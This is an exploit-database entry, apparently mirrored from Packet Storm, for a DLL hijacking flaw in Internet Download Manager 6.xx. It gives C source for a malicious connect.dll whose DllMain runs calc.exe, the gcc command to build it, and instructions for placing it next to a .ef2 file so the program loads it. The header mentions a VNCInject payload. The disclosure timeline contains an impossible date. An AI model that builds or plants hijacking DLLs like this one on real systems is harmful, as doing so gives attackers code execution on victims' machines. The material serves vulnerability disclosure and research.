Lucene search
+L

Internet Download Manager 6.xx DLL Hijacking

🗓️ 11 Apr 2015 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Internet Download Manager 6.xx DLL Hijacking, Local Exploit, Vendor Refusal to Patc

Code
`/*  
#[+] Author: TUNISIAN CYBER  
#[+] Exploit Title: Internet Download Manager 6.XX DLL Hijacking  
#[+] Date: 30-03-2015  
#[+] Type: Local Exploits  
#[+] Vendor: http://www.internetdownloadmanager.com/  
#[+] Tested on: WinXp  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
#[+] POC IMG:http://i.imgur.com/qfkEFR8.png (VNCInject)  
#[+] gcc -shared -o connect.dll dllhijack.c  
#[+] create .ef2 file and put it with connect.dll in the same dir.calc.exe will popup  
#[+]Proof of Concept (PoC):  
#[+]Timle Line:  
07/04/2015:Vulnerability was discovered.  
09/04/2015: Contact with vendor.  
10/04/2015: No reply.  
11/04/2015: Vendor Refused to patch the vulnerability.  
2014-15-03: Vulnerability Published  
=======================  
*/  
  
#include <windows.h>  
  
int tunisian()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
tunisian();  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation